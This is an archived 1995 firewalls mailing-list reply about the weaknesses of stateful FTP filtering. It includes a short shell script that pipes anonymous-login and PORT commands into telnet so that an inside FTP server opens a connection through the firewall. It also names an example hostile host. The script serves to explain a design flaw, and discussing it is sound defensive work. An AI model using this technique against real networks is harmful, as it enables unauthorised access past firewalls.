Great Circle Associates Firewalls
(October 1995)
 

Indexed By Date: [Previous] [Next] Indexed By Thread: [Previous] [Next]

Subject: Re: Various FTPs
From: "Mark A. Fullmer" <maf @ net . ohio-state . edu>
Date: Sun, 15 Oct 1995 02:15:40 -0400 (EDT)
To: padgett @ tccslr . dnet . mmc . com (A. Padgett Peterson P.E. Information Security)
Cc: firewalls @ greatcircle . com
In-reply-to: <9510130120 . AA18104 @ uvs1 . orl . mmc . com> from "A. Padgett Peterson, P.E. Information Security" at Oct 12, 95 09:20:04 pm
Reply-to: maf @ net . ohio-state . edu

A. Padgett Peterson, P.E. Information Security writes:
>
>I agree with Marcus concerning the probloms in FTP & possibly IPV6
>will repair/replace it. For now I suspect that the answer is a
>Firewall that will only allow an Inward port 20 connection if
>the inside node already had a port 21 outward connection (No, I
>do not mean via "established" I mean the firewall should beep track
>of what connections exist).

If Victim is inside the firewall, all Attacker needs to do is coerce 
Victim to initiate an outgoing connection to port 21 which then opens
up the firewall.  If Victim has an anonymous FTP server running, and the
firewall allows a connection, this is just too easy:

#!/bin/sh

# replace A.B.C.D with your IPAddr

echo "
user anonymous
pass foo @
 bar .
 com
port A,B,C,D,0,21
list
quit
" | telnet victim 21

Set your srcPort to 20 and you're in, minimally to dstPort >= 1024.

Opening a back channel for FTP also implies trusting random FTP servers
on the Internet and the path to those servers.  With point and click
web pages that open connections who knows where, most people probably
have no idea they just made a FTP connection to evil.hacker.site.com
that starts up a XscreenDump script back to all anonymous FTP users'
machines.

-- 
mark
maf+ @
 osu .
 edu



References:
  • Various FTPs
    From: padgett @ tccslr . dnet . mmc . com (A. Padgett Peterson, P.E. Information Security)
Indexed By Date Previous: form recognition within WWW?
From: Tom Kozlowski <tkozlows @ AGSM . UCLA . EDU>
Next: Courtney & NetStalker Software
From: forster @ ns2 . emirates . net . ae (Andrew & Terri Forster)
Indexed By Thread Previous: Re: Various FTPs
From: peter @ nmti . com (Peter da Silva)
Next: Re: Various FTPs
From: "Stephen H. Goldstein" <steveg @ cseic . saic . com>

Google
 
Search Internet Search www.greatcircle.com